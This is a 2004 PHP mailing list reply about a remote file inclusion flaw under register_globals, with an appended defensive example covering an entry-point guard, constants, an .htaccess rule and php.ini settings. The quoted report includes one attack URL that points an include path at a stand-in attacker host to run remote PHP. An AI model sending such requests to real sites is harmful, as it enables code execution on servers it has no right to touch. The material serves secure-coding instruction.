Re: allow_url_fopen ini directive not enough

On Friday 10 December 2004 06:05, KJ wrote:

> The vulnerability occurred where both applications had a variable setting
> a base directory of the source code, which was used when including files
> throughout the application, i.e.:
>
> $base_url = '/home/example.com/www';
> include_once ($base_url.'/config.php');
>
> In config.php you would then have, for example:
>
> <?php
> include_once ($base_url.'/whatever.php');
> ...
> ?>
>
> Now in each instance register globals was on and all that was needed to
> compromise the site was to have a variable passed in the url to set the
> base url to a remote site, which in turn output php to execute, i.e.:
>
> http://example.com/config.php?base_url=http://myhacksite.example.com

Basically this particular case boils down to: "files that are included and 
should not be called directly" should not be allowed to be called directly.

You can do this at the application level, whereby each included file checks 
whether it was called directly and refuses to run when that is so.

Or you can do this on a system level and tell your webserver not to allow 
access to particular files or directories.

-- 
Jason Wong -> Gremlins Associates -> www.gremlins.biz
Open Source Software Systems Integrators
* Web Design & Hosting * Internet & Intranet Applications Development *
------------------------------------------
Search the list archives before you post
http://marc.theaimsgroup.com/?l=php-general
------------------------------------------
/*
Brook's Law:
 Adding manpower to a late software project makes it later.
*/

-- 
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
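As an added example (not code from KJ's or Jason's post), here is what the two 
defences Jason describes look like next to each other for KJ's layout. The file 
names index.php, config.php and whatever.php follow KJ's message; the APP_ENTRY 
and BASE_DIR constants, the 403 response, the .htaccess rule and the php.ini 
lines are assumptions for illustration. The two PHP sections are two separate 
files shown in one listing.

```php
<?php
/* ===== index.php : the only script the web server should hand to PHP =====
 *
 * The vulnerable pattern from KJ's report (do not use) was:
 *
 *   $base_url = '/home/example.com/www';
 *   include_once ($base_url.'/config.php');
 *
 * With register_globals = On, a request such as
 *   config.php?base_url=http://myhacksite.example.com
 * pre-sets $base_url before config.php runs, and because config.php was
 * requested directly nothing re-assigns it, so include_once fetches and
 * executes the attacker's file.
 *
 * Two changes below: constants instead of a variable (a constant cannot be
 * overwritten by register_globals or by a later assignment), and a marker
 * that every included file checks before doing anything.
 */
define('APP_ENTRY', true);                  // marker: this is the entry point
define('BASE_DIR', dirname(__FILE__));      // absolute path, never user input
                                            // (__DIR__ on PHP 5.3+)
require_once BASE_DIR . '/config.php';

/* ===== config.php : included only; refuses to run when requested directly ===== */
if (!defined('APP_ENTRY')) {
    // Reached when config.php itself is the requested URL. Refuse before any
    // include so an overridden variable can never be used as an include path.
    header('HTTP/1.0 403 Forbidden');
    exit('Direct access to this file is not permitted.');
}
// BASE_DIR is a constant, so ?base_url=... in the query string is irrelevant.
require_once BASE_DIR . '/whatever.php';

/* ===== System level (Apache .htaccess in the directory holding the includes) =====
 *
 * Keeping includes outside the document root is better still; when they must
 * live under it, tell the web server not to serve them at all:
 *
 *   <FilesMatch "\.(inc|php)$">
 *       Order allow,deny        # Apache 2.2 syntax
 *       Deny from all           # Apache 2.4: Require all denied
 *   </FilesMatch>
 *
 * and in php.ini, as defence in depth for this whole bug class:
 *
 *   register_globals = Off
 *   allow_url_fopen  = Off     ; PHP 5.2+ also has allow_url_include = Off
 */
```

The constant-based guard has to sit at the very top of each included file, 
before any include or side effect; a check that runs after `include_once 
($base_url.'/whatever.php')` is too late, since the remote file has already 
executed by then.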

